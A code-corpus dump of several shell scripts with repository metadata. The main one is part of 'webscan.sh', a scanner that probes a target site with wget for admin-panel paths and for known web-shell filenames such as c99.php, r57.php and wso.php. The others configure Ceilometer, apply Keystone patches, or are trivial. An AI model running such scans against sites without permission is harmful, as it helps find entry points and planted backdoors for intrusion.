if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usr"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuario"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuarios"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuarios/login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuarios/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuarios/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuarios/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/usuarios/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/utility_login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/uvpanel"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vadmind"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vmailadmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vorod.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vorod.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vorod"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vorud.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vorud.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/vorud"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/WebAdmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/admin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/index.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.brfbrf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin/login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webmaster.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webmaster.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webmaster"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wizmysqladmin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-admin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-login"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-login.brf"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-login.cfm"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-login.cgi"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-login.js"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wp-login.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/xlogin"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/yonetici.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/yonetici.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/yonetici.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/yonetim.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/yonetim.html"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/yonetim.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ysadmin.asp"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/angel.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/c100.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cyberwarrior.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/c99.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/dq99.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/kacak.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/r57.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/privr57.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/GaZa.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/b374k.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/uploadshell.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/file.aspx"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/1n73ction.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/alucar.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/backdoor.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/cw.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/ekinox.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/mysql.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/priv-b374k.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/r00t.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/saudi.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/simattacker.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/sosyete.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/syrian.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/webadmin.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/x2300.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/zaco.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/shell.aspx"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/shellupload"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/tryag.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/tryag.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
fi
d="/wso.php"
c=$b$d
wget -qO- $c &> /dev/null
opreation=$?
if [ $opreation = 0 ]
then
echo "ws > admin cpanel found in this url $c"
read -p "Press <Enter> to continue search or press <ctrl+c> to exit program"
echo "-----------------------------------------------------------------------"
cd ..
rm -r ouputcpanel
fi
else
echo "./webscan.sh: Options Not Found Type ./webscan.sh -h to show Options"
fi
|
ahmadnourallah/Webscan
|
webscan.sh
|
Shell
|
apache-2.0
| 443,139 |
#!/bin/bash
set -e
. /opt/kolla/kolla-common.sh
check_required_vars KEYSTONE_ADMIN_SERVICE_HOST \
KEYSTONE_ADMIN_SERVICE_PORT \
KEYSTONE_ADMIN_TOKEN \
KEYSTONE_PUBLIC_SERVICE_HOST
dump_vars
cat > /openrc <<EOF
export SERVICE_TOKEN="${KEYSTONE_ADMIN_TOKEN}"
export SERVICE_ENDPOINT="${KEYSTONE_AUTH_PROTOCOL}://${KEYSTONE_ADMIN_SERVICE_HOST}:${KEYSTONE_ADMIN_SERVICE_PORT}/v2.0"
EOF
cfg=/etc/ceilometer/ceilometer.conf
crudini --set $cfg \
DEFAULT rpc_backend rabbit
crudini --set $cfg \
DEFAULT rabbit_host ${RABBITMQ_SERVICE_HOST}
crudini --set $cfg \
DEFAULT rabbit_password ${RABBIT_PASSWORD}
crudini --set $cfg \
keystone_authtoken \
auth_uri \
"http://${KEYSTONE_PUBLIC_SERVICE_HOST}:5000/"
crudini --set $cfg \
keystone_authtoken \
admin_tenant_name \
"${ADMIN_TENANT_NAME}"
crudini --set $cfg \
keystone_authtoken \
admin_user \
"${CEILOMETER_KEYSTONE_USER}"
crudini --set $cfg \
keystone_authtoken \
admin_password \
${CEILOMETER_ADMIN_PASSWORD}
crudini --set $cfg \
service_credentials \
os_auth_url \
${KEYSTONE_AUTH_PROTOCOL}://${KEYSTONE_PUBLIC_SERVICE_HOST}:5000/
crudini --set $cfg \
service_credentials \
os_username \
ceilometer
crudini --set $cfg \
service_credentials \
os_tenant_name \
service
crudini --set $cfg \
service_credentials \
os_password \
${CEILOMETER_ADMIN_PASSWORD}
crudini --set $cfg \
publisher \
metering_secret \
${METERING_SECRET}
|
invenfantasy/kolla
|
docker/common/ceilometer/ceilometer-base/config-ceilometer.sh
|
Shell
|
apache-2.0
| 1,559 |
#!/bin/bash
echo "This is a job in a subdirectory"
echo "RES:done"
|
rfgiusti/runexp
|
test4/runs/subdir/subjob.sh
|
Shell
|
apache-2.0
| 67 |
#!/bin/bash
cd /usr/share/openstack-puppet/
echo "Cleaning up before patching..."
rm -rf puppet-keystone.git
git clone https://github.com/stackforge/puppet-keystone.git puppet-keystone.git
cd puppet-keystone.git
echo "Applying support for keystone v3 api - v3 domain utility code"
# support for keystone v3 api - v3 domain utility code
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/85/178385/23 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - the domain resource"
# support for keystone v3 api - the domain resource
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/39/174439/35 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - the project resource"
# support for keystone v3 api - the project resource
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/68/174468/33 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - the user resource"
# support for keystone v3 api - the user resource
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/76/174976/29 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - the user_role resource"
# support for keystone v3 api - the user_role resource
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/99/174999/29 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - keystone and keystone::roles::admin"
# support for keystone v3 api - keystone and keystone::roles::admin
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/60/175060/34 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - make_keystone_user_role_name"
# support for keystone v3 api - make_keystone_user_role_name
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/55/193355/1 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - keystone::resource::authconfig"
# support for keystone v3 api - keystone::resource::authconfig
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/56/193356/1 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - resource::service_identity"
# support for keystone v3 api - resource::service_identity
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/57/193357/1 && git cherry-pick FETCH_HEAD
echo "Applying support for keystone v3 api - keystone::endpoint"
# support for keystone v3 api - keystone::endpoint
git fetch https://[email protected]/openstack/puppet-keystone refs/changes/59/193359/1 && git cherry-pick FETCH_HEAD
echo "Patching finished"
echo "Creating symlink"
cd ../modules
rm -rf keystone
ln -s ../puppet-keystone.git keystone
|
imcsk8/gerrit-utils
|
keystone_v3_patches.sh
|
Shell
|
apache-2.0
| 2,904 |
#!/bin/sh
frfile=$1
shift
broken=
